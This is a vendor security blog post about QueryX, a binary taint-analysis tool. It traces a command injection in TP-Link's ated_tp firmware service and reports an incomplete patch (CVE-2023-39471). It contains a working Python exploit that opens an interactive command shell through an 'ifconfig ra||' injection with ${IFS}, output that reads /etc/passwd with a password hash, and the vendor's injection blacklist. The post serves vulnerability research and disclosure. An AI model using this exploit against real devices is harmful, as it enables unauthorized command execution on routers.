Finding Vulnerabilities in Firmware with the Static Analysis Platform QueryX
Introduction
Similar security vulnerabilities appear repeatedly for various reasons. That’s why variant analysis, which looks for variations of a known vulnerability, is one of the most common vulnerability detection methods. QueryX is a program analysis platform under active development at Theori that offers automated variant analysis. In this blog post, we share our experience testing the taint analysis module of QueryX and the vulnerabilities it uncovered, including CVE-2023-39471.
Development of Taint Analysis
In November 2022, the QueryX paper was accepted to the 2023 IEEE Symposium on Security and Privacy (S&P). QueryX began as an internal R&D project to automatically detect security vulnerabilities in binary programs whose source code is not publicly available. It analyzed decompiled code and let users write queries to find vulnerabilities matching patterns of interest. It also provided a variety of analysis techniques, including syntactic matching, dataflow analysis, and symbolic analysis. It found 15 new vulnerabilities, including 10 CVEs in the Windows kernel and related binaries, which earned $180,000 in bug bounties.
Since then, we’ve added more analysis techniques, including taint analysis. In short, taint analysis determines whether a value can flow from one point in a program (a source) to another (a sink). It runs faster than the existing analyzers, which helped us filter out infeasible alarms and analyze programs more deeply. Our tool is based on abstract interpretation and models the program’s memory state abstractly, which lets it track taint information. We adopted a modular analysis approach: each function is analyzed only once to produce a reusable function summary, and the stored summaries are then used to compute the program state at each call to that function. This improved the scalability of the analyzer without sacrificing much accuracy.
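To make the summary idea concrete, here is a minimal Python sketch of summary-based (modular) taint propagation. It is not QueryX’s implementation: the toy program representation PROGRAM, the function names in it, and the helper summarize are all hypothetical, and each function body is reduced to a table saying where each parameter’s value flows. A function’s summary, the set of its parameters that can reach a sink, is computed once, cached, and reused at every call site.

```python
# Hypothetical toy program: for each function, map each parameter index to the
# places its value flows. A destination is either ("sink",) for a dangerous call
# such as popen, or ("call", callee, arg_index) for an argument of another call.
PROGRAM = {
    "run_cmd": {0: [("sink",)]},                   # e.g. a popen wrapper
    "log_msg": {0: []},                            # value never reaches a sink
    "parse":   {0: [("call", "run_cmd", 0)], 1: [("call", "log_msg", 0)]},
    "handler": {0: [("call", "parse", 0)], 1: [("call", "parse", 1)]},
    "debug":   {0: [("call", "run_cmd", 0)]},
}

SUMMARIES = {}       # function name -> frozenset of parameter indices reaching a sink
ANALYSIS_COUNT = {}  # how many times each function body was actually analyzed


def summarize(func):
    """Return the parameters of `func` whose values can reach a sink.

    Each function body is analyzed at most once; later calls reuse the cached
    summary. Recursion is not handled (a real analyzer iterates to a fixpoint).
    """
    if func in SUMMARIES:
        return SUMMARIES[func]
    ANALYSIS_COUNT[func] = ANALYSIS_COUNT.get(func, 0) + 1
    tainted = set()
    for param, destinations in PROGRAM[func].items():
        for dest in destinations:
            if dest[0] == "sink":
                tainted.add(param)
            elif dest[0] == "call":
                _, callee, arg_index = dest
                # Apply the callee's summary instead of re-analyzing its body.
                if arg_index in summarize(callee):
                    tainted.add(param)
    SUMMARIES[func] = frozenset(tainted)
    return SUMMARIES[func]


print(sorted(summarize("handler")))  # prints [0]: parameter 0 of handler reaches a sink
```

Summarizing handler analyzes parse, run_cmd, and log_msg along the way, even though handler calls parse twice; a later summarize("debug") reuses the cached summary of run_cmd rather than analyzing it again. This is the property that lets a modular analysis scale, at the cost of some context sensitivity.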
Applying Taint Analysis to Firmware
We tested our implementation against the firmware of embedded devices, for several reasons. First, embedded firmware is typically closed source, which makes it difficult to use traditional static analyzers that target source code. Our tool, by contrast, is well suited to this setting because it works directly on binaries. In addition, many firmware images are publicly available on vendor websites, so we could run tests on a large number of them, collecting a lot of data and getting the most out of static analysis.
We created queries for injection vulnerabilities such as command injection and SQL injection. Because these are typically caused by user input being passed to dangerous functions, they are ideal for measuring the performance of taint analysis. They are also well suited to building queries from known vulnerabilities, since such weaknesses are found quite often in embedded devices. We implemented a system that automatically extracts large numbers of firmware images and runs the analysis on them. We then ran experiments and triaged the resulting alarms.
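The extraction-and-analysis system is not described in detail, so the following is only a minimal sketch of one piece of such a pipeline, assuming each firmware image has already been unpacked into a directory (for example with a tool such as binwalk). It walks the unpacked tree, picks out ELF executables by their `\x7fELF` magic bytes, and hands each one to an analysis callback. find_elf_binaries, analyze_firmware, and the analyze callback are hypothetical names standing in for the real analyzer.

```python
import os

ELF_MAGIC = b"\x7fELF"


def find_elf_binaries(root):
    """Yield paths of ELF files under an already-extracted firmware root."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            # Skip symlinks (common in BusyBox-based images) and special files.
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                with open(path, "rb") as f:
                    if f.read(4) == ELF_MAGIC:
                        yield path
            except OSError:
                continue  # unreadable file: skip it rather than abort the run


def analyze_firmware(root, analyze):
    """Run `analyze` (a stand-in for the real analyzer) on every ELF binary.

    Results are keyed by each binary's path relative to the firmware root.
    """
    results = {}
    for path in sorted(find_elf_binaries(root)):
        results[os.path.relpath(path, root)] = analyze(path)
    return results
```

For example, analyze_firmware("extracted/TL-WR841N", run_queries), where both the path and run_queries are hypothetical, would return one result per binary in that image. Keying results by relative path makes it easy to compare the same binary across different models or firmware versions.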
CVE-2022-42433
Before we examine our analysis results, let’s look at the vulnerability we used to build our query: a simple command injection vulnerability in the TP-Link TL-WR841N, assigned CVE-2022-42433.
function is_source(node) {
    return function_parameter(node, "recvfrom", 1);
}
function is_sink(node) {
    return function_parameter(node, "popen", 0);
}
let alarms = start_taint(is_source, is_sink);
for (let i = 0; i < alarms.length; i++) {
    print(alarms[i]);
}
As some of you may have noticed, our query language resembles JavaScript. We implemented an interpreter for a subset of JavaScript that also lets users call our custom functions. Previous analyzers that took a similar approach defined their own query languages, which users first had to learn. We chose JavaScript, which is familiar to many programmers, so that queries are easy to write and can express rich logic.
In the above query, node refers to the AST (Abstract Syntax Tree) node being analyzed. function_parameter is one of our custom functions: it takes a node, a function name, and an argument index (zero-based, so 1 means the second argument), and returns a boolean indicating whether the node is the argument at that index of a call to that function. If we define the source and sink points of the taint analysis with the is_source and is_sink functions as above and pass them to our custom function start_taint, the analyzer runs the taint analysis and returns the results.
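The following Python sketch imitates the shape of this query API on a small, hand-written dataflow graph to show how source and sink predicates can drive a reachability search. Node, FLOWS, and the three-argument start_taint are hypothetical stand-ins: QueryX’s start_taint takes only the two predicates and works on abstract program states, which this sketch does not model.

```python
from collections import deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Node:
    """Hypothetical node: argument `index` of a call to `callee`."""
    callee: str
    index: int


def function_parameter(node, name, index):
    # True if `node` is argument `index` of a call to `name`.
    return node.callee == name and node.index == index


def start_taint(is_source, is_sink, flows):
    """Return (source, sink) pairs connected by a path in `flows`.

    `flows` maps a node to the nodes its value is passed to (a toy dataflow graph).
    """
    nodes = set(flows) | {n for succs in flows.values() for n in succs}
    alarms = []
    for source in sorted((n for n in nodes if is_source(n)), key=repr):
        seen, queue = {source}, deque([source])
        while queue:  # breadth-first search from each source
            current = queue.popleft()
            if is_sink(current):
                alarms.append((source, current))
            for nxt in flows.get(current, []):
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append(nxt)
    return alarms


# Toy graph loosely following the recvfrom -> popen flow analyzed below.
FLOWS = {
    Node("recvfrom", 1): [Node("process_iwpriv_cmd", 0)],
    Node("process_iwpriv_cmd", 0): [Node("getCmdResults", 0)],
    Node("getCmdResults", 0): [Node("popen", 0)],
    Node("fgets", 0): [Node("puts", 0)],  # unrelated flow, produces no alarm
}


def is_source(node):
    return function_parameter(node, "recvfrom", 1)


def is_sink(node):
    return function_parameter(node, "popen", 0)


for alarm in start_taint(is_source, is_sink, FLOWS):
    print(alarm)
```

Keeping the source and sink definitions as plain predicates means the same search can be reused for other vulnerability classes just by swapping the two functions, which is the flexibility the JavaScript query exposes.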
int __fastcall sub_401220(int sock)
{
    int v7;
    int v17;
    const char *str;
    char buffer[1464];
    ...
    s = accept(sock, 0, 0);
    ...
    memset(buffer, 0, 1460);
    v7 = recvfrom(s, buffer, 1460, 0, 0, 0);
    if ( v7 <= 0 )
        break;
    ...
    if ( buffer[v7 - 1] != 10 )
        goto LABEL_5;
    str = strtok_r(buffer, "\r\n", &v17);
    while ( str && *str )
    {
        ...
        memset(v20, 0, sizeof(v20));
        v10 = process_iwpriv_cmd(str, v20, 1450);
        ...
    }
    ...
}
The vulnerability occurs in the ated_tp binary, which can be launched via a specific request. The program reads user input from a socket with the recvfrom function, splits it into lines with strtok_r using \r and \n as delimiters, and passes each line to the process_iwpriv_cmd function.
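A small Python model of this receive-and-split step can help when reasoning about exactly what reaches process_iwpriv_cmd. It is reconstructed only from the decompiled listing above: split_commands is a hypothetical helper, it handles the bytes from a single recvfrom call, and the behavior at LABEL_5 is left out because the listing elides it.

```python
import re


def split_commands(data):
    r"""Model how the received bytes become command lines.

    Returns None if `data` does not end with a newline byte (the binary then
    jumps to LABEL_5, whose behavior is not shown). Otherwise it splits like
    strtok_r(buffer, "\r\n", ...): runs of CR/LF bytes are treated as a single
    delimiter and empty tokens are never returned.
    """
    if not data.endswith(b"\n"):
        return None
    # strtok_r treats the buffer as a C string, so it stops at the first NUL.
    text = data.split(b"\x00", 1)[0]
    return [line for line in re.split(rb"[\r\n]+", text) if line]


print(split_commands(b"ifconfig ra0 up\r\nls\n"))
```

The trailing-newline requirement is why the PoC later in this post terminates every command it sends with \n.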
int __fastcall process_iwpriv_cmd(const char *a1, const char *a2, int a3)
{
    int CmdResults;
    int cnt;
    const char *v9;
    int cnt_;
    const char *tokens[3];
    ...
    memset(a2, 0, a3);
    strncpy(a2, a1, a3 - 1);
    cnt = SplitString(a2, tokens, 20, " ");
    v9 = tokens[0];
    cnt_ = cnt;
    if ( strcmp(tokens[0], "iwpriv") || strncmp(tokens[1], "ra", 2) )
    {
        if ( cnt_ == 3 )
        {
            CmdResults = -1;
            if ( !strcmp(v9, "ifconfig") && !strncmp(tokens[1], "ra", 2) )
                CmdResults = getCmdResults(a1, 0, a2, a3);
        }
        ...
    }
    ...
}
The SplitString function splits a copy of the passed value on the space character (“ ”) and returns the number of tokens. To reach the getCmdResults function, the line must contain exactly three tokens, the first being “ifconfig” and the second starting with “ra”.
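These token checks can be modeled in a few lines of Python. This is a sketch under one explicit assumption: that SplitString behaves like splitting on runs of spaces, since its body is not shown. reaches_getcmdresults is a hypothetical name. The outer condition in the decompiled code, strcmp(tokens[0], "iwpriv") || ..., is always true when the first token is “ifconfig”, so the sketch omits it.

```python
def reaches_getcmdresults(line):
    """Return True if `line` would reach the getCmdResults call.

    Assumption: SplitString splits on runs of spaces (its body is not shown).
    """
    tokens = [tok for tok in line.split(" ") if tok]
    return (
        len(tokens) == 3                # cnt_ == 3
        and tokens[0] == "ifconfig"     # !strcmp(v9, "ifconfig")
        and tokens[1].startswith("ra")  # !strncmp(tokens[1], "ra", 2)
    )


for line in ["ifconfig ra0 up", "ifconfig eth0 up",
             "ifconfig ra|| cat /etc/passwd", "ifconfig ra|| cat${IFS}/etc/passwd"]:
    print(f"{line!r}: {reaches_getcmdresults(line)}")
```

The last two lines show why an injected command containing spaces has to be rewritten without them: with a literal space it produces four tokens and never reaches popen, while the ${IFS} form keeps the count at three. This is the trick the PoC later in this post relies on.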
int __fastcall getCmdResults(const char *a1, int a2, const char *a3, int a4)
{
    int v8;
    ...
    v8 = popen(a1, &unk_403178);
    ...
}
The getCmdResults function is a wrapper for popen, and it receives a1, the original line, rather than the split copy in a2. A user who controls the input can therefore put any shell syntax they want in the third token, and the whole line is executed by popen, leading to a command injection vulnerability.
recvfrom -> process_iwpriv_cmd -> getCmdResults -> popen
The user input flows along the path shown above. Based on these observations, we can write a taint analysis query that uses the second argument of recvfrom as the source and the first argument of popen as the sink, which is the query shown earlier.
Results
When we ran an experiment based on the above query, our analyzer found three true positives. They illustrate the main reasons vulnerabilities recur and why variant analysis matters. One had exactly the same pattern as the vulnerability above but appeared in a different model. In practice, many products from the same manufacturer share a lot of code, so a vulnerability found in one product may also appear in others. Therefore, when a vulnerability is disclosed, it is important to identify all affected programs and patch them appropriately.
The remaining two were caused by incomplete patches, another reason similar vulnerability patterns recur. This happens when a patch fixes only some aspects of a vulnerability instead of eliminating it entirely. Likewise, patching one vulnerability can inadvertently introduce a new one, so patches should always be written with care and tested thoroughly.
int __fastcall getCmdResults(const char *a1, int a2, const char *a3, int a4)
{
    int v9;
    ...
    if ( sub_402720(a1) == 1 )
    {
        puts("inject cmd match");
        return -1;
    }
    else
    {
        puts("cmd check ok");
        v9 = popen(a1, "r");
        ...
    }
    ...
}
Let’s take a look at how the manufacturer patched the above vulnerability. They added a routine that validates the user input before calling the popen function. The checking function (sub_402720) uses blacklist filtering to reject input containing dangerous characters, a common pattern for sanitizing against injection vulnerabilities.
004135E4 # "\";" # ";\""
004135EC # "$(" # ")"
004135F4 # ";" # ";"
004135FC # "\n" # "\n"
00413604 # "`" # "`"
0041360C # "&" # "&"
00413614 # "&" # ";"
0041361C # "&" # "\n"
00413624 # ";" # "\n"
0041362C # "$IFS" # "\n"
The function checks whether any of the string pairs above appear in order in the input outside of quotes. While investigating this alarm, we found that the ‘|’ character was not checked at all, so the command injection remained exploitable.
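The gap can be illustrated with a deliberately simplified Python model of the filter. This is not the firmware’s logic: is_blocked and the pattern lists are hypothetical, only the first string of each pair from the tables is used, and quote handling is ignored. The checked value is the line getCmdResults receives, from which strtok_r has already removed the newline.

```python
# First string of each pair in the original blacklist (0x4135E4-0x41362C).
ORIGINAL_PATTERNS = ['";', "$(", ";", "\n", "`", "&", "$IFS"]
# The patched table (0x4134CC-0x413524) additionally contains "||" and "|".
PATCHED_PATTERNS = ORIGINAL_PATTERNS + ["||", "|"]


def is_blocked(cmd, patterns):
    """Simplified blacklist check: reject `cmd` if it contains any pattern.

    Deliberately stricter than the firmware's pair-based check: only the first
    string of each pair is used, and quoting is ignored.
    """
    return any(pattern in cmd for pattern in patterns)


payload = "ifconfig ra|| cat${IFS}/etc/passwd"
print(is_blocked(payload, ORIGINAL_PATTERNS))  # False: nothing in the list matches "|"
print(is_blocked(payload, PATCHED_PATTERNS))   # True: "||" is now blacklisted
```

Because a pair can only match when its first string is present, a line that passes this stricter model should also pass the original pair-based check, assuming the in-order matching described above. Note also that ${IFS} does not contain the substring $IFS, so for a substring-based check like this one the braces in the payload matter.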
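#!/usr/bin/env python3
import socket
import sys
import time

# run_ated_tp(ip), which starts the ated_tp binary on the target, is omitted here:
# it was adapted from code published on the web (see the description below).


def connect_socket(ip):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, 5000))
    while True:
        print('$ ', end='')
        # ated_tp requires exactly three space-separated tokens, so spaces in
        # the injected command are replaced with ${IFS}.
        command = input().replace(' ', '${IFS}')
        if command == 'quit':
            break
        # "ifconfig ra||" passes the token checks; "||" then runs our command.
        sock.sendall(f'ifconfig ra|| {command}\n'.encode())
        data = sock.recv(1024).split(b'\n')
        # Drop the trailing "# " shell prompt from the response.
        if data and data[-1] == b'# ':
            data = data[:-1]
        print(b'\n'.join(data).decode())
    sock.close()


if __name__ == '__main__':
    ip = sys.argv[1]
    print('[+] open ated_tp')
    run_ated_tp(ip)
    time.sleep(3)
    print('[+] connect to target')
    connect_socket(ip)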
We created the PoC above to verify that the vulnerability actually occurs. The run_ated_tp function starts the ated_tp binary; for it, we took code published on the web and modified it slightly. The connect_socket function handles the actual communication. As we saw above, the line must split into exactly three tokens on the space character, so the PoC replaces every space in the command with ${IFS}. Inserting || makes the shell run the injected command if the preceding ifconfig ra command fails, which lets attackers execute arbitrary commands.
❯ ./poc.py 192.168.0.1
[+] open ated_tp
[+] connect to target
$ ls
web
var
usr
sys
sbin
proc
mnt
linuxrc
lib
etc
dev
bin
$ cat /etc/passwd
admin:$1$$iC.dUsGpxNNJGeOm1dFio/:0:0:root:/:/bin/sh
dropbear:x:500:500:dropbear:/var/dropbear:/bin/sh
nobody:*:0:0:nobody:/:/bin/sh
The figure above shows the results of executing the PoC.
004134CC # "\";" # ";\""
004134D4 # "$(" # ")"
004134DC # ";" # ";"
004134E4 # "\n" # "\n"
004134EC # "`" # "`"
004134F4 # "&" # "&"
004134FC # "&" # ";"
00413504 # "&" # "\n"
0041350C # ";" # "\n"
00413514 # "||" # "\n"
0041351C # "|" # "\n"
00413524 # "$IFS" # "\n"
The vulnerability we found was assigned CVE-2023-39471 and earned a $1,100 credit. The vendor patched it by adding the “||” and “|” patterns to the blacklist, as shown above.
Conclusion
So far, we’ve described our journey of testing the taint analysis of QueryX and discovering real-world vulnerabilities. QueryX is not yet publicly available; it is under active development as we add and refine analysis techniques and make it possible to combine them flexibly. Automatically finding vulnerabilities is an attractive goal but a challenging one, and our team looks forward to sharing more good news soon.